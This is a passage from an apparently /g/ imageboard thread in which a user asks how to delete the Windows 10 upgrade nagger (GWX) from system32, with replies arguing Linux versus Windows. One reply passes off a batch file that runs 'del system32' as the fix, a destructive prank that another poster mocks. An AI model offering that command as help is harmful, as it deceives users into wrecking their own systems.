i hate this whole win 10 shit. i want to uninstall gwx.exe with all its folder from sys32 but apparently its forbidden.
any ideas?
Install gentoo
Why are you still using windows?
>>51896531
>Install gentoo
thanks for offer but i think i'll stick with win7 for now
windows 8.0 does not have this issue
>>51896541
Why so? What are the benefits over any Linux based OS?
>>51896538
Because you can play video games beyond tux racer on it.
>>51896541
Or, you could keep Win10 and dual-boot a non botnet OS. Do all your work on one side, switch to the other when you want to play a game.
>>51896538
i bet its a matter of getting used to smth
>>51896541
>thanks for offer but i think i'll stick with win7 for now
>Thanks for the solution to my complaint, but I'd rather continue having problems with my computer and shitting up /g/ with my easily resolved complaints.
>>51896549
Application support in most cases.
Coming from a linux user (for everything but gaymen and Adobe products)
>>51896554
yeah keep talking.
i just want to keep my damn win7 without the nagging win10 proposals.
and the advantage over any linux is the actual programs that i use.. apparently ableton live doesn't support linux.
>>51896513
microsoft is moving forward, deal with it retard or join all the other retards and install gonu/lenucks
You have to assign ownership of the GWX folder in sys32 to yourself. You can't uninstall it but you can append .old to the folder name and the 4 or 5 exes inside. Then remove and disable windows update KB3035583.
this script also does all the work for you.
open notepad and type the following
@echo off
cd c:\windows
del system32
change the file type to all files and save the file as removegwx.bat and run it. Now your computer is botnet free!
>>51896583
There's more than one update linked with the downgrade to spyware10 bullshit, you need to remove them all to stop the nagging.
At least i know that i'm going to switch to Linux when win7 support ends.
>>51896675
>del system32
thanks man it seems all my problems wanished
>>51896513
nice blog loser
>>51896574
Yeah I like Linux for the same reason I like Android. Customization. I just love that. Though it may be inconvenient using a VM or Wine for things like gaymen and Adobe, the customization is mainly what sold it for me.

I haven't touched windows in 2 years. Managed to avoid it so far but I might install windows 10 to see what all the fuss is about.
